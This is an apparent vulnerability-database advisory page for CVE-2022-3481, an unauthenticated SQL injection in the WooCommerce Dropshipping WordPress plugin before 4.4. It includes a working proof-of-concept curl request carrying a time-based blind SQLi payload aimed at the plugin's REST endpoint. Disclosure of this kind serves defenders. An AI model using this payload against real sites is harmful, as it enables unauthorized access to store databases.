Lucene search
WpvulndbWPEX-ID:C5E395F8-257E-49EB-AFBD-9C1E26045373HistoryOct 17, 2022 - 12:00 a.m.
WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi
2022-10-1700:00:00
wpvulndb
74
woocommerce
dropshipping
unauthenticated
sqli
exploit
0.002 Low
EPSS
Percentile
57.8%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via a REST endpoint available to unauthenticated users, leading to a SQL injection
curl -isk -X 'POST' -H "Content-Type: application/json" --data '{"sku":"a\" AND (SELECT 42 FROM (SELECT(SLEEP(5)))wlHd)-- pOeU"}' 'https://example.com/wp-json/woo-aliexpress/v1/product-sku' Related
nvd
nvd
CVE-2022-3481
2022-11-07 10:15:11
patchstack
patchstack
cvelist
cvelist
CVE-2022-3481 WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi
2022-11-07 00:00:00
cve
cve
CVE-2022-3481
2022-11-07 10:15:11
wpvulndb
wpvulndb
WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi
2022-10-17 00:00:00
prion
prion
Sql injection
2022-11-07 10:15:00